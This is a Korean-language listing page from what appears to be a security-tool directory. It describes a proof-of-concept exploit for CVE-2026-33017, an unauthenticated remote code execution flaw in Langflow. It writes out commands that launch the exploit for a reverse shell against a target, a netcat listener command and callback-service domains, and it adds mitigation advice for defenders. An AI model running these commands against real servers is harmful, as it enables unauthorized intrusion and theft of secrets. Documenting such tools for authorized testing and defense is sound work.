Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-33017-Langflop — CVE-2026-33017 Langflow RCE PoC | Kitploit
도구/GitHubGitHub/tatosec/cve-2026-33017-langflop
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubtatosec/cve-2026-33017-langflop

CVE-2026-33017-Langflop

CVE-2026-33017 Langflow RCE PoC

저장소 보기
15일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-33017 Langflow ("Langflop") 무인증 RCE PoC

Langflow의 무인증 build_public_tmp 코드 실행 취약점에 대한 PoC입니다. 악성 구성 요소를 공개 플로우에 업로드하고 빌드를 트리거하여 리버스 셸을 획득합니다.

승인된 보안 테스트에만 사용하세요. 자신이 소유했거나 명시적 테스트 허가를 받은 시스템에만 사용하십시오.

요구 사항

  • Python 3
  • requests (pip install requests)

사용법

내장 리스너를 실행하고 익스플로잇을 한 번에 실행합니다:

root@kitploit:~
python3 poc.py \
  --url https://target:7860 \
  --flow-id <public-flow-uuid> \
  --lhost <your-ip> \
  --lport 4444 \
  --listen

셸이 연결되면 자동으로 완전한 대화형 셸로 업그레이드를 시도합니다.

자체 리스너(예: nc -lvnp 4444)를 사용하려면 --listen을 제거하세요:

root@kitploit:~
python3 poc.py --url https://target:7860 --flow-id <uuid> --lhost <your-ip> --lport 4444

옵션

정보

CVE-2026-33017은 Langflow의 POST /api/v1/build_public_tmp/{flow_id}/flow 엔드포인트에서 발생하는 무인증 RCE로, 샌드박싱 없이 플로우 노드 정의에서 공격자가 제공한 Python 코드를 실행합니다. 자세한 내용은 아래 자료를 확인하세요:

  • Sysdig Threat Research 분석 보고서: CVE-2026-33017: 20시간 만에 Langflow AI 파이프라인을 손상시킨 공격자들의 방법
  • NVD: CVE-2026-33017

권장 사항(방어자)

Sysdig Threat Research 분석 보고서의 완화 조치:

  • 업데이트: Langflow를 즉시 업데이트하세요. 패치된 버전이 아직 제공되지 않는 경우 /api/v1/build_public_tmp 엔드포인트에 대한 네트워크 접근을 제한하거나 공개 플로우 빌드를 완전히 비활성화하세요.
  • 감사: 공개적으로 노출된 모든 Langflow 인스턴스의 환경 변수와 비밀값을 감사하세요. 예방 차원에서 API 키, 데이터베이스 비밀번호, 클라우드 자격 증명을 교체하세요.
  • 모니터링: 비정상적인 포트 또는 알려진 콜백 서비스(oastify.com, interact.sh, dnslog.cn)로의 외부 연결을 모니터링하세요. 이는 활발한 악용 및 데이터 유출을 나타냅니다.
  • 제한: 방화벽 규칙 또는 인증이 있는 리버스 프록시를 사용하여 Langflow 인스턴스에 대한 네트워크 접근을 제한하세요. !!Langflow는 인증 계층 없이 인터넷에 직접 노출되어서는 안 됩니다!!
  • 인벤토리 정리: 환경 내 AI/ML 도구를 인벤토리로 정리하세요. Langflow, n8n 및 기타 워크플로 자동화 도구는 광범위한 API 접근 권한으로 실행되고 표준 보안 검토 프로세스 외부에 배포되는 경우가 많아 점점 더 공격 대상이 되고 있습니다.

면책 조항

이 도구는 연구 및 승인된 침투 테스트를 위해 제공됩니다. 저자는 오용 또는 손해에 대해 책임을 지지 않습니다.

도구 다운로드
플래그설명
--url대상 Langflow 서버 URL (필수)
--flow-id공유된 공개 플로우의 UUID (필수)
--lhost리버스 셸 콜백 IP (필수)
--lport리버스 셸 콜백 포트 (필수)
--listen내장 리스너 실행
--timeoutHTTP 요청 시간 제한(초) (기본값 30)
-k, --insecureTLS 인증서 검증 비활성화(자체 서명/만료 인증서)
--no-upgrade자동 TTY 업그레이드 건너뛰기, 기본 라인 셸 사용